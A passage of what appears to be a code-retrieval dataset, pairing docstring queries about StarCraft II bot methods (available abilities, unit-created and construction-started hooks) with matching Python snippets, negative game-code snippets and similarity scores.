self.bottom[\"x_min\"]:\n x = (self.bottom[\"x_max\"] + self.bottom[\"x_min\"])/2\n else:\n x = self.bottom[\"x_max\"]\n if self.bottom[\"y_max\"] != self.bottom[\"y_min\"]:\n y = (self.bottom[\"y_max\"] + self.bottom[\"y_min\"])/2\n else:\n y = self.bottom[\"y_max\"]\n else:\n raise ValueError(\"Invalid number for sides!\")\n\n return x, y", "def spawn_enemies():\n\n enemy_num = random.randint(1,5)\n spawn_box = spawn_boxes[random.randint(0, 3)]\n\n if spawn_box.y <= 0: start = [0, 128]\n elif spawn_box.y >= 640: start = [0, -128]\n elif spawn_box.x <= 0: start = [128, 0]\n elif spawn_box.x >= 640: start = [-128, 0]\n\n x = spawn_box.x\n y = spawn_box.y\n new_enemies = []\n for i in range(enemy_num):\n new_enemies.append(enemies.Wolf(x + 32, y + 32, grid, (x + 32 + start[0], y + 32 + start[1])))\n x += 64\n if not spawn_box.collidepoint(x, y):\n x = spawn_box.x\n y += 64\n\n all_enemies.add(new_enemies)\n all_sprites.add(new_enemies)", "def create_enemies_list(self):\n import random\n random.seed()\n enemies = [\"Assets/images/Inimigo_1_verde.png\", \"Assets/images/Inimigo_1_verm.png\", \"Assets/images/Inimigo_2.png\", \"Assets/images/Inimigo_3.png\"]\n start_x, start_y = 10, 25\n x, y = start_x, start_y\n tamanho = min(self.game.count_inimigos, self.running.colunas)\n self.game.count_inimigos += 1\n for j in range(tamanho): \n e_type = random.choice(enemies)\n enemy = Enemy(self.game, x, y, e_type)\n self.running.inimigos.append(enemy)\n self.running.game_images.append(enemy.game_image)\n x += self.running.x_space\n return", "def __init__(self, center, waypoints, firepoints):\n super().__init__(center, MallFighter.MALL_FIGHTER_SPEED, MallFighter.ANIMATION_DELAY, *MallFighter.FILE_PATH)\n self.fire_idx = 0\n self.way_idx = 0\n self.waypoints = waypoints\n self.firepoints = firepoints", "def start(self):\n self.startAngMovementALl()\n self.startMovementAll()", "def __init__(self, center_loc, tent_loc = Location(0,0)):\n self.center_loc = center_loc\n self.tents = []\n self.tents.append(tent_loc)", "def __init__(self, start_x, start_y):\n self.x = start_x\n self.y = start_y\n\n self._dead_end_direction = [[]]\n self._moved = False\n self._junction_index = [1]\n\n self.path = [[start_x, start_y]]", "def exploring_starts(self):\n def random_choice(l): return l[np.random.randint(len(l))]\n return map(random_choice, (self.env.states, self.env.moves))", "def __init__(self, num_points=5000):\n self.num_points = num_points\n\n # All walks start at (0, 0)\n self.x_values = [0]\n self.y_values = [0]", "def __init__(self, num_points=5000):\n self.num_points = num_points\n\n # All walks start at (0, 0)\n self.x_values = [0]\n self.y_values = [0]", "def get_spawns(world):\r\n my_start = world.get_friendly_nest_positions()[0]\r\n their_start = world.get_enemy_nest_positions()[0]\r\n\r\n return my_start, their_start, len(world.get_shortest_path(my_start, their_start, None))", "def _hit_start_set(self, value):\n self._hit_start = self._prep_coord(value, \"hit_end\", le)", "def __init__(self, name, agent, all_locations):\n super().__init__(name)\n self.agent = agent\n self.world = agent.world\n self.all_locations = all_locations\n self.location_feat = get_location_key(agent)", "def getStartState(self):\n \"\"\" A state space can be the start coordinates and a list to hold visited corners\"\"\"\n return (self.startingPosition, [])\n # util.raiseNotDefined()", "def startMovementAll(self):\n self.startMovementX()\n self.startMovementY()\n self.startMovementZ()", "def calculate_screen_position(self):\r\n\r\n character_select_start_y = 604\r\n character_select_end_y = 646\r\n\r\n if self.slotNumber <= 6:\r\n start_y = 585 # 595\r\n end_y = 627 # 637\r\n x_hero_number = self.slotNumber\r\n else:\r\n start_y = 300 # 290\r\n end_y = 342 # 332\r\n x_hero_number = self.slotNumber - 6\r\n\r\n start_x = 249 + (x_hero_number * 192)\r\n end_x = 326 + (x_hero_number * 192)\r\n\r\n self.screenPositionCharacterSelect = {\r\n \"start_x\": start_x,\r\n \"end_x\": end_x,\r\n \"start_y\": character_select_start_y,\r\n \"end_y\": character_select_end_y\r\n }\r\n self.screenPositionTab = {\r\n \"start_x\": start_x,\r\n \"end_x\": end_x,\r\n \"start_y\": start_y,\r\n \"end_y\": end_y\r\n }", "def start_loc(self) -> str:\n return self._start_loc", "def get_enemy_gun(self):\n return [(self.rect.x + x_pos, self.rect.y + y_pos) for x_pos, y_pos in MallFighter.GUN_POS_OFFSETS]", "def _prepare_first_step(self):\n if self.townhalls:\n self._game_info.player_start_location = self.townhalls.first.position\n self._game_info.map_ramps, self._game_info.vision_blockers = self._game_info._find_ramps_and_vision_blockers()" ]
[ "0.615017", "0.61056244", "0.6083833", "0.57885003", "0.5781765", "0.5773303", "0.5729508", "0.5711662", "0.56731534", "0.5590496", "0.5586484", "0.5582612", "0.55793685", "0.5547637", "0.552948", "0.5490197", "0.5463405", "0.5449208", "0.54371756", "0.54257303", "0.54257303", "0.53848076", "0.5378839", "0.5348591", "0.5338669", "0.5310377", "0.52950704", "0.5290277", "0.5290005", "0.527351" ]
0.8132698
0
Returns available abilities of one or more units. Right now only checks cooldown, energy cost, and whether the ability has been researched.
async def get_available_abilities( self, units: Union[List[Unit], Units], ignore_resource_requirements: bool = False ) -> List[List[AbilityId]]: return await self._client.query_available_abilities(units, ignore_resource_requirements)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def capabilities(self, abilities):\n capabilities = []\n for ability in abilities:\n if self.privileged_to_run(ability) and ability.find_executors(self.executors, self.platform):\n capabilities.append(ability)\n return capabilities", "def _abilities_all_units(self) -> Counter:\n abilities_amount = Counter()\n for unit in self.units + self.structures: # type: Unit\n for order in unit.orders:\n abilities_amount[order.ability] += 1\n if not unit.is_ready:\n if self.race != Race.Terran or not unit.is_structure:\n # If an SCV is constructing a building, already_pending would count this structure twice\n # (once from the SCV order, and once from \"not structure.is_ready\")\n abilities_amount[self._game_data.units[unit.type_id.value].creation_ability] += 1\n\n return abilities_amount", "def __add_expanded_abilities(self, name):\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n abilities = loop.run_until_complete(self.api.process_requests(\n \"ability\", name))\n ability_list = []\n factory = PokemonAbilityFactory(abilities, True)\n for ability in factory.create():\n ability_list.append(ability)\n return ability_list", "def test_models_organization_get_abilities_administrator(self):\n access = factories.UserOrganizationAccessFactory(role=\"administrator\")\n abilities = access.organization.get_abilities(access.user)\n self.assertEqual(\n abilities,\n {\n \"delete\": False,\n \"get\": True,\n \"patch\": True,\n \"put\": True,\n \"manage_accesses\": True,\n },\n )", "def units_which_can_be_built(self):\n what_can_be_built = [Pikeman.kind]\n player = self.player\n if player.age in ('bronze age', 'iron age'):\n shields = BronzeShields\n swords = BronzeSwords\n if all(s.name in player.things_researched for s in (shields, swords)):\n what_can_be_built.append(Swordsman.kind)\n return what_can_be_built", "def testabilities(self):\n for ability in WeaponAbility.typelist:\n a = WeaponAbility(ability)\n self.assert_(ability in str(a))\n self.assertTrue(isinstance(a.AC, int))\n self.assertTrue(isinstance(a.description(), str))", "def getAllPossibleMeleeAttacks(self):\n\t\traise NotImplementedError(\"Base abstract class Individual\")", "def abilities_all_types():\r\n\r\n ability_mods = abilities_gen_mods()\r\n\r\n with patch(\"funclg.utils.data_mgmt.id_gen\", side_effect=ability_ids()):\r\n all_abilities = []\r\n for index, a_type in enumerate(ABILITY_TYPES):\r\n\r\n all_abilities.append(\r\n Abilities(\r\n name=f\"Ability_{index}\",\r\n ability_type=a_type,\r\n description=f\"{a_type} ability\",\r\n mod=ability_mods[a_type],\r\n )\r\n )\r\n\r\n all_abilities.append(\r\n Abilities(\r\n name=\"Ability_Error_NoMod\",\r\n ability_type=\"Error\",\r\n description=\"Error ability\",\r\n )\r\n )\r\n return all_abilities", "def test_models_organization_get_abilities_member_user(self):\n access = factories.UserOrganizationAccessFactory(role=\"member\")\n\n with self.assertNumQueries(1):\n abilities = access.organization.get_abilities(access.user)\n\n self.assertEqual(\n abilities,\n {\n \"delete\": False,\n \"get\": True,\n \"patch\": False,\n \"put\": False,\n \"manage_accesses\": False,\n },\n )", "def _get_legal_actions(self):\n return self.game.get_legal_actions()", "def get_active_units(self):\n alive_units = self.get_alive_units()\n active_units = []\n for alive_unit in alive_units:\n if not alive_unit.ready_to_attack():\n continue\n active_units.append(alive_unit)\n return active_units", "def find_ability(abilities: list, character_class: str, attack_type: str) -> Dict:\n # Find the ability to use\n ability_to_use = {\"effects\": [], \"enhancements\": []}\n for ability in abilities:\n if (ability[\"class\"] == character_class) and (ability[\"type\"] == attack_type):\n ability_to_use = ability\n break\n\n return ability_to_use", "def get_available_actions(self):\n actions = [self.ACTIONS_INDEXES['IDLE']]\n\n # Shall we also restrict LEFT & RIGHT actions ?\n\n if self.spacecraft.velocity_index < self.spacecraft.SPEED_COUNT - 1:\n actions.append(self.ACTIONS_INDEXES['FASTER'])\n if self.spacecraft.velocity_index > 0:\n actions.append(self.ACTIONS_INDEXES['SLOWER'])\n return actions", "def get_missions(): # noqa: E501\n return 'do some magic!'", "def test_models_organization_get_abilities_preset_role(self):\n access = factories.UserOrganizationAccessFactory(role=\"member\")\n access.organization.user_role = \"member\"\n\n with self.assertNumQueries(0):\n abilities = access.organization.get_abilities(access.user)\n\n self.assertEqual(\n abilities,\n {\n \"delete\": False,\n \"get\": True,\n \"patch\": False,\n \"put\": False,\n \"manage_accesses\": False,\n },\n )", "def testabilities(self):\n for ability in AmuletAbility.typelist:\n a = AmuletAbility(ability)\n self.assertEqual(a.type, ability)\n if ability != 'Attribute':\n self.assert_(ability in str(a))\n self.assertTrue(isinstance(a.AC, int))\n self.assertTrue(isinstance(a.description(), str))", "def retrieve_handcrafted_inputs(self, obs):\n self.detect_self_unit_types(obs)\n\n feature_units = obs.observation.feature_units\n allies = [unit for unit in feature_units if unit.alliance == _PLAYER_SELF]\n selected_allies = [unit for unit in allies if unit.unit_type == self.current_group_id]\n enemies = [unit for unit in feature_units if unit.alliance == _PLAYER_ENEMY]\n\n hitpoints = 0\n for unit in selected_allies:\n hitpoints += unit.health\n\n if self.current_group_id in unit_health.keys():\n init_hp = 0\n init_hp = unit_health[self.current_group_id] * self.init_unit_counts[self.current_group_id]\n else:\n init_hp = self.initial_self_hit_points\n current_hp = hitpoints / init_hp\n\n weapon_cooldown = 0\n for ally in selected_allies:\n if ally.weapon_cooldown > 0:\n weapon_cooldown += 1\n if weapon_cooldown > (len(selected_allies) / 2):\n # nn input weapon cooldown = 1 means the majority cannot fire\n weapon_cooldown = 1\n else:\n weapon_cooldown = 0\n\n self_weapon_range = 5\n self_radius = 1\n self_unit_type = 1\n self_speed = 1\n if len(selected_allies) > 0:\n self_weapon_range = weapon_ranges[self.current_group_id]\n self_radius = unit_sizes[self.current_group_id] / float(2)\n self_unit_type = unit_type[self.current_group_id]\n self_speed = unit_speed[self.current_group_id]\n\n enemy_radius = 1\n enemy_weapon_range = 1\n enemy_unit_type = 0\n enemy_speed = 1\n if len(enemies) > 0:\n self.enemy_id = enemies[0].unit_type\n enemy_weapon_range = weapon_ranges[self.enemy_id]\n enemy_radius = unit_sizes[self.enemy_id] / float(2)\n enemy_unit_type = unit_type[self.enemy_id]\n enemy_speed = unit_speed[self.enemy_id]\n\n # TODO can be inaccurate if using melee units\n if self.retrieve_distance_between_positions(self.retrieve_enemy_location(obs),\n self.get_avg_location_of_self_subgroup(obs)) < (\n self_radius + self_weapon_range + enemy_radius):\n enemy_in_range = 1\n else:\n enemy_in_range = 0\n\n in_enemy_range = 0\n for ally in selected_allies:\n for enemy in enemies:\n if self.retrieve_distance_between_positions([enemy.x, enemy.y], [ally.x, ally.y]) < (\n self_radius + enemy_weapon_range + enemy_radius):\n in_enemy_range = 1\n break\n else:\n in_enemy_range = 0\n if in_enemy_range:\n break\n\n north_bound, south_bound, west_bound, east_bound = self.calculate_distance_to_bounds(obs, for_subgroup=True)\n\n if self.previous_commands[self.current_group_id] == \"FIGHT\":\n prev_cmd = 1\n elif self.previous_commands[self.current_group_id] == \"FLEE\":\n prev_cmd = 0\n\n nw_enemy_presence, ne_enemy_presence, sw_enemy_presence, se_enemy_presence = self.detect_enemies_by_region(obs,\n for_subgroup=True)\n\n distance_to_enemy = self.retrieve_distance_between_positions(self.retrieve_enemy_location(obs),\n self.get_avg_location_of_self_subgroup(obs))\n distance_to_enemy = distance_to_enemy / float((32 ** 2 + 20 ** 2) ** 0.5)\n\n return [current_hp, weapon_cooldown, enemy_in_range, in_enemy_range, prev_cmd, north_bound, south_bound,\n west_bound, east_bound,\n nw_enemy_presence, ne_enemy_presence, sw_enemy_presence, se_enemy_presence, self_unit_type,\n enemy_unit_type, self_weapon_range, enemy_weapon_range, self_speed, enemy_speed, distance_to_enemy]", "def possible_rooms(self):\r\n return self.rooms", "def retrieve_handcrafted_inputs(self, obs):\n feature_units = obs.observation.feature_units\n allies = [unit for unit in feature_units if unit.alliance == _PLAYER_SELF]\n enemies = [unit for unit in feature_units if unit.alliance == _PLAYER_ENEMY]\n\n current_hp = self.calculate_hitpoints(feature_units, _PLAYER_SELF)\n current_hp = current_hp / self.initial_self_hit_points\n\n weapon_cooldown = 0\n for ally in allies:\n if ally.weapon_cooldown > 0:\n weapon_cooldown += 1\n if weapon_cooldown > (len(allies) / 2):\n # nn input weapon cooldown = 1 means the majority cannot fire\n weapon_cooldown = 1\n else:\n weapon_cooldown = 0\n\n self_weapon_range = 5\n self_radius = 1\n self_unit_type = 1\n if len(allies) > 0:\n self_weapon_range = weapon_ranges[allies[0].unit_type]\n self_radius = unit_sizes[allies[0].unit_type] / float(2)\n self_unit_type = unit_type[allies[0].unit_type]\n\n enemy_radius = 1\n enemy_weapon_range = 1\n enemy_unit_type = 0\n if len(enemies) > 0:\n enemy_weapon_range = weapon_ranges[enemies[0].unit_type]\n enemy_radius = unit_sizes[enemies[0].unit_type] / float(2)\n enemy_unit_type = unit_type[enemies[0].unit_type]\n\n if self.retrieve_distance_between_positions(self.retrieve_enemy_location(obs),\n self.get_current_location(obs)) < (\n self_radius + self_weapon_range + enemy_radius):\n enemy_in_range = 1\n else:\n enemy_in_range = 0\n\n if self.retrieve_distance_between_positions(self.retrieve_enemy_location(obs),\n self.get_current_location(obs)) < (\n self_radius + enemy_weapon_range + enemy_radius):\n in_enemy_range = 1\n else:\n in_enemy_range = 0\n\n north_bound, south_bound, west_bound, east_bound = self.calculate_distance_to_bounds(obs)\n\n if self.previous_command == \"FIGHT\":\n prev_cmd = 1\n elif self.previous_command == \"FLEE\":\n prev_cmd = 0\n\n nw_enemy_presence, ne_enemy_presence, sw_enemy_presence, se_enemy_presence = self.detect_enemies_by_region(obs)\n\n return [current_hp, weapon_cooldown, enemy_in_range, in_enemy_range, prev_cmd, north_bound, south_bound,\n west_bound, east_bound,\n nw_enemy_presence, ne_enemy_presence, sw_enemy_presence, se_enemy_presence, self_unit_type,\n enemy_unit_type]", "def availability(self) -> list:\n availability = self._availability\n return availability", "def amenities(self):\n G, mapping = self.network()\n waste = []\n resources = []\n intmed_products = []\n\n for nd in G:\n # if nd[0] != \"r\":\n if not isinstance(nd, int):\n if not G.in_edges(nd):\n resources.append(nd)\n elif not G.out_edges(nd):\n if nd != self.commodity:\n waste.append(nd)\n else:\n intmed_products.append(nd)\n\n return waste, resources, intmed_products", "def get_store_availabilities(self, store_id):\n resp = self._request_json(\"/available\", params={\"locale\": store_id})\n return resp[\"available\"]", "def available_items(self):\n return [item for item in self.all_items.values() if self.is_available(item)]", "def retrieve_handcrafted_inputs(self, obs):\n feature_units = obs.observation.feature_units\n allies = [unit for unit in feature_units if unit.alliance == _PLAYER_SELF]\n enemies = [unit for unit in feature_units if unit.alliance == _PLAYER_ENEMY]\n\n current_hp = self.calculate_hitpoints(feature_units, _PLAYER_SELF)\n current_hp = current_hp / self.initial_self_hit_points\n\n weapon_cooldown = 0\n for ally in allies:\n if ally.weapon_cooldown > 0:\n weapon_cooldown += 1\n if weapon_cooldown > (len(allies) / 2):\n # nn input weapon cooldown = 1 means the majority cannot fire\n weapon_cooldown = 1\n else:\n weapon_cooldown = 0\n\n self_weapon_range = 5\n self_radius = 1\n self_unit_type = 1\n self_speed = 1\n if len(allies) > 0:\n self_weapon_range = weapon_ranges[allies[0].unit_type]\n self_radius = unit_sizes[allies[0].unit_type] / float(2)\n self_unit_type = unit_type[allies[0].unit_type]\n self_speed = unit_speed[allies[0].unit_type]\n\n enemy_radius = 1\n enemy_weapon_range = 1\n enemy_unit_type = 0\n enemy_speed = 1\n if len(enemies) > 0:\n enemy_weapon_range = weapon_ranges[enemies[0].unit_type]\n enemy_radius = unit_sizes[enemies[0].unit_type] / float(2)\n enemy_unit_type = unit_type[enemies[0].unit_type]\n enemy_speed = unit_speed[enemies[0].unit_type]\n\n if self.retrieve_distance_between_positions(self.retrieve_enemy_location(obs),\n self.get_current_location(obs)) < (\n self_radius + self_weapon_range + enemy_radius):\n enemy_in_range = 1\n else:\n enemy_in_range = 0\n\n north_bound, south_bound, west_bound, east_bound = self.calculate_distance_to_bounds(obs)\n\n if self.previous_command == \"FIGHT\":\n prev_cmd = 1\n elif self.previous_command == \"FLEE\":\n prev_cmd = 0\n\n nw_enemy_presence, ne_enemy_presence, sw_enemy_presence, se_enemy_presence = self.detect_enemies_by_region(obs)\n\n return [current_hp, weapon_cooldown, enemy_in_range, prev_cmd, north_bound, south_bound, west_bound, east_bound,\n nw_enemy_presence, ne_enemy_presence, sw_enemy_presence, se_enemy_presence, self_unit_type,\n enemy_unit_type, self_weapon_range, enemy_weapon_range, self_speed, enemy_speed]", "def info_equipment_get():\n equipment = _equipment_by_group()\n return equipment, 200", "def _get_legal_actions(self):\n raise NotImplementedError", "def test_models_organization_get_abilities_authenticated(self):\n organization = factories.OrganizationFactory()\n abilities = organization.get_abilities(factories.UserFactory())\n self.assertEqual(\n abilities,\n {\n \"delete\": False,\n \"get\": True,\n \"patch\": False,\n \"put\": False,\n \"manage_accesses\": False,\n },\n )", "def retrieve_handcrafted_inputs(self, obs):\n feature_units = obs.observation.feature_units\n allies = [unit for unit in feature_units if unit.alliance == _PLAYER_SELF]\n enemies = [unit for unit in feature_units if unit.alliance == _PLAYER_ENEMY]\n\n current_hp = self.calculate_hitpoints(feature_units, _PLAYER_SELF)\n current_hp = current_hp / self.initial_self_hit_points\n\n weapon_cooldown = 0\n for ally in allies:\n if ally.weapon_cooldown > 0:\n weapon_cooldown += 1\n if weapon_cooldown > (len(allies) / 2):\n # nn input weapon cooldown = 1 means the majority cannot fire\n weapon_cooldown = 1\n else:\n weapon_cooldown = 0\n\n self_weapon_range = 5\n self_radius = 1\n self_unit_type = 1\n self_speed = 1\n if len(allies) > 0:\n self.self_id = allies[0].unit_type\n self_weapon_range = weapon_ranges[self.self_id]\n self_radius = unit_sizes[self.self_id] / float(2)\n self_unit_type = unit_type[self.self_id]\n self_speed = unit_speed[self.self_id]\n\n enemy_radius = 1\n enemy_weapon_range = 1\n enemy_unit_type = 0\n enemy_speed = 1\n if len(enemies) > 0:\n self.enemy_id = enemies[0].unit_type\n enemy_weapon_range = weapon_ranges[self.enemy_id]\n enemy_radius = unit_sizes[self.enemy_id] / float(2)\n enemy_unit_type = unit_type[self.enemy_id]\n enemy_speed = unit_speed[self.enemy_id]\n\n if self.retrieve_distance_between_positions(self.retrieve_enemy_location(obs),\n self.get_current_location(obs)) < (\n self_radius + self_weapon_range + enemy_radius):\n enemy_in_range = 1\n else:\n enemy_in_range = 0\n\n in_enemy_range = 0\n for ally in allies:\n for enemy in enemies:\n if self.retrieve_distance_between_positions([enemy.x, enemy.y], [ally.x, ally.y]) < (\n self_radius + enemy_weapon_range + enemy_radius):\n in_enemy_range = 1\n break\n else:\n in_enemy_range = 0\n\n north_bound, south_bound, west_bound, east_bound = self.calculate_distance_to_bounds(obs)\n\n if self.previous_command == \"FIGHT\":\n prev_cmd = 1\n elif self.previous_command == \"FLEE\":\n prev_cmd = 0\n\n nw_enemy_presence, ne_enemy_presence, sw_enemy_presence, se_enemy_presence = self.detect_enemies_by_region(obs)\n\n return [current_hp, weapon_cooldown, enemy_in_range, in_enemy_range, prev_cmd, north_bound, south_bound,\n west_bound, east_bound,\n nw_enemy_presence, ne_enemy_presence, sw_enemy_presence, se_enemy_presence, self_unit_type,\n enemy_unit_type, self_weapon_range, enemy_weapon_range, self_speed, enemy_speed, self.self_id,\n self.enemy_id]", "def available(name):\n return name in get_all()", "def getPurchasableUpgrades(self) -> list:\n pass" ]
[ "0.6250166", "0.60964966", "0.602298", "0.59705406", "0.59497154", "0.58937514", "0.5730924", "0.5714051", "0.5709866", "0.57032293", "0.56360984", "0.56252784", "0.5617863", "0.5564902", "0.5512842", "0.54977745", "0.54958105", "0.54682755", "0.54319596", "0.5417294", "0.5415358", "0.54072577", "0.54035", "0.536859", "0.5364589", "0.5339249", "0.5330102", "0.53072345", "0.5249561", "0.5249483" ]
0.72035104
0
Override this in your bot class. This function is called when a unit is created.
async def on_unit_created(self, unit: Unit):
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self, *args):\n this = _libsbml.new_UnitDefinition(*args)\n try: self.this.append(this)\n except: self.this = this", "def createUnit(self):\n return _libsbml.Model_createUnit(self)", "def createUnit(self):\n return _libsbml.UnitDefinition_createUnit(self)", "def __init__(self):\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)", "def _start(self, unit):\n raise NotImplementedError", "def setup_game(self):", "async def on_building_construction_started(self, unit: Unit):", "def setUp(self):\n user = User.objects.create(username=\"nerd\")\n self.description = \"Write world class code\"\n # specify owner of a event\n self.event = Event(description=self.description, owner=user)", "def setUp(self):\n self.bot = helpers.MockBot()\n self.bot.api_client.get = unittest.mock.AsyncMock()\n self.cog = information.Information(self.bot)\n self.member = helpers.MockMember(id=1234)", "def setUp(self):\n self.game = TTTBoard(3)", "def __init__(self, *args):\n this = _libsbml.new_Unit(*args)\n try: self.this.append(this)\n except: self.this = this", "def _create_user_unit(self, battlefield_role):\n print(\"\\nWhich {} unit would you like to add?\".format(battlefield_role))\n # if HQ add named characters as well\n if battlefield_role == \"HQ\":\n print(\"Named Characters (Including Wargear):\")\n keys = list(init.units_dict[\"Named Characters\"].keys())\n top_len = len(max(keys, key=len))\n for index, [keys, value] in enumerate(init.units_dict[\"Named Characters\"].items()):\n print(\"A\" + str(index + 1) + \". \" +\n keys.ljust(top_len) + \"\\t({}pts)\".format(value[\"pts\"]))\n print('') # create space between set of options\n\n print(\"Other Characters (Including base Wargear):\")\n units = list(init.units_dict[battlefield_role].keys())\n top_len = len(max(units, key=len))\n for index, [keys, value] in enumerate(init.units_dict[battlefield_role].items()):\n print(\"B\" + str(index + 1) + \". \" + keys.ljust(top_len) +\n \"\\t({}pts)\".format(value[\"pts\"]))\n else:\n # print available models and their points with the points value\n # left adjusted so they are in the same column\n print(\"Available Models (Including base Wargear):\")\n units = list(init.units_dict[battlefield_role].keys())\n top_len = len(max(units, key=len))\n for index, [keys, value] in enumerate(init.units_dict[battlefield_role].items()):\n print(str(index + 1) + \". \" + keys.ljust(top_len) +\n \"\\t({}pts for {} models)\".format(value[\"pts\"] * value[\"size\"][0], value[\"size\"][0]))\n\n user_input = input(\">> \")\n try:\n if user_input.lower() in {'q', 'exit', 'cancel', 'quit', 'return'}:\n return False\n elif re.match('([aAbB][1-9][0-9]*)|([1-9][0-9]*)', user_input):\n if battlefield_role == \"HQ\":\n if user_input[0] in {'A', 'a'}:\n user_input = list(init.units_dict[\"Named Characters\"].keys())[\n int(user_input[1:]) - 1]\n elif user_input[0] in {'B', 'b'}:\n user_input = list(init.units_dict[\"HQ\"].keys())[int(user_input[1:]) - 1]\n elif user_input[0].isdigit():\n user_input = list(init.units_dict[battlefield_role].keys())[int(user_input) - 1]\n\n return squad.Unit(user_input, battlefield_role)\n except (KeyError, IndexError):\n print(\"{} is not a valid option, please select the unit by name or input\".format(user_input))\n print(\"To quit please enter 'q'\")\n unit = self._create_user_unit(battlefield_role)\n return unit", "def add_unit(self):\n detach = self.army.detachments[self._get_user_detachment()]\n battlefield_role = self._get_user_battlefield_role()\n unit = self._create_user_unit(battlefield_role)\n self._add_unit(detach, unit)\n return", "def setUp(self):\n self.player = Player()", "def setUp(self):\n self.game = BuildGame()\n self.effects = []", "def __init(self):\n print(\"Welkam tu mobail lejen\")", "def setUp(self):\n self.delegate = AlwaysHitDelegate(\"\")\n self.environment = BattleEnvironment()", "async def on_building_construction_complete(self, unit: Unit):", "def create_unit(self, unit_type):\n unit = None\n\n if unit_type == 'ElfRider':\n unit = ElfRider()\n elif unit_type == 'Knight':\n unit = Knight()\n elif unit_type == \"DwarfFighter\":\n unit = DwarfFighter()\n elif unit_type == 'OrcRider':\n unit = OrcRider()\n elif unit_type == 'Fairy':\n unit = Fairy()\n elif unit_type == 'Wizard':\n unit = Wizard()\n elif unit_type == 'ElfLord':\n unit = ElfLord()\n elif unit_type == 'OrcFighter':\n unit = OrcFighter()\n\n return unit", "def __init__(self):\n self.drones = ZergUnit(UnitTypeId.DRONE, to_count=0)\n self.lings = ZergUnit(UnitTypeId.ZERGLING, to_count=999)\n self.queens = ZergUnit(UnitTypeId.QUEEN, to_count=3)\n self.roaches = ZergUnit(UnitTypeId.ROACH, to_count=100, priority=True)\n self.ravagers = ZergUnit(UnitTypeId.RAVAGER, to_count=0)\n self.defense_spines = DefensiveBuilding(\n unit_type=UnitTypeId.SPINECRAWLER, position_type=DefensePosition.Entrance, to_base_index=1, to_count=3\n )\n self.gas = StepBuildGas(to_count=3)\n\n unit_building = BuildOrder(\n [\n Step(None, self.drones, skip_until=self.should_build_drones),\n Step(UnitExists(UnitTypeId.SPAWNINGPOOL), self.defense_spines),\n Step(\n RequiredAll([UnitExists(UnitTypeId.ROACHWARREN), UnitExists(UnitTypeId.ROACH)]),\n self.ravagers,\n skip_until=self.should_build_ravagers,\n ),\n Step(UnitExists(UnitTypeId.ROACHWARREN), self.roaches),\n Step(\n RequiredAll(\n [\n UnitExists(UnitTypeId.SPAWNINGPOOL),\n UnitExists(\n UnitTypeId.ROACHWARREN,\n include_pending=True,\n include_not_ready=True,\n include_killed=True,\n ),\n ]\n ),\n self.lings,\n ),\n Step(UnitExists(UnitTypeId.SPAWNINGPOOL), self.queens),\n Step(UnitExists(UnitTypeId.SPAWNINGPOOL), self.lings),\n ]\n )\n\n buildings: BuildOrder = BuildOrder(\n [\n Step(None, ActBuilding(UnitTypeId.SPAWNINGPOOL, to_count=1)),\n Step(UnitExists(UnitTypeId.SPAWNINGPOOL), ActBuilding(UnitTypeId.ROACHWARREN, to_count=1)),\n Step(None, self.gas, skip_until=self.should_build_gas),\n ]\n )\n\n super().__init__(buildings, unit_building)", "async def on_unit_destroyed(self, unit_tag):", "def setUp(self):\n self.bot = helpers.MockBot()\n self.bot.api_client.get = unittest.mock.AsyncMock()\n self.cog = information.Information(self.bot)", "def create_unit(self, unit_type, unit_name, modifiers,\n nb_examples_asked=None):\n new_unit = None\n relevant_dict = None\n if unit_type == pu.UnitType.alias:\n new_unit = AliasDefinition(unit_name, modifiers)\n # new_unit = AliasDefinition(unit_name, [], modifiers.argument_name,\n # modifiers.casegen)\n relevant_dict = self.alias_definitions\n self.stats[\"#aliases\"] += 1\n elif unit_type == pu.UnitType.slot:\n new_unit = SlotDefinition(unit_name, modifiers)\n # new_unit = SlotDefinition(unit_name, [], modifiers.argument_name,\n # modifiers.casegen)\n relevant_dict = self.slot_definitions\n self.stats[\"#slots\"] += 1\n elif unit_type == pu.UnitType.intent:\n new_unit = IntentDefinition(unit_name, modifiers)\n # new_unit = IntentDefinition(unit_name, [], modifiers.argument_name,\n # modifiers.casegen)\n relevant_dict = self.intent_definitions\n self.stats[\"#intents\"] += 1\n\n if unit_type == pu.UnitType.intent and nb_examples_asked is not None:\n (train_nb, test_nb) = nb_examples_asked\n new_unit.set_nb_examples_asked(train_nb, test_nb)\n\n if unit_name not in relevant_dict:\n relevant_dict[unit_name] = new_unit\n elif modifiers.variation_name is None:\n pass # Rules will be added to the already defined unit", "def start_fixture(self):\n pass", "def createUnitDefinition(self):\n return _libsbml.Model_createUnitDefinition(self)", "def __init__(self, name=\"RandomRobot\"):\n super().__init__(name)", "def __init__(self):\n GameObject.__init__(self)\n\n # private attributes to hold the properties so they appear read only\n self._client_type = \"\"\n self._creatures = []\n self._lost = False\n self._name = \"Anonymous\"\n self._opponent = None\n self._reason_lost = \"\"\n self._reason_won = \"\"\n self._time_remaining = 0\n self._total_health = 0\n self._won = False", "def __init__(self, lunit=\"nm\"):\n super().__init__(lunit)", "def setUp(self):\n self.t = Timew()", "def setUp(self):\n self.t = Timew()" ]
[ "0.6457518", "0.62285805", "0.62217605", "0.615402", "0.61094606", "0.6098572", "0.60835135", "0.60660774", "0.6036553", "0.60170555", "0.5984654", "0.5978691", "0.59778404", "0.5977131", "0.59517694", "0.594605", "0.59400856", "0.5938614", "0.59215844", "0.5919174", "0.58836854", "0.58530736", "0.58447", "0.57913274", "0.5776574", "0.575998", "0.57592523", "0.57545316", "0.5749272", "0.5749272" ]
0.8054851
0
Override this in your bot class. This function is called when a building construction has started.
async def on_building_construction_started(self, unit: Unit):
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
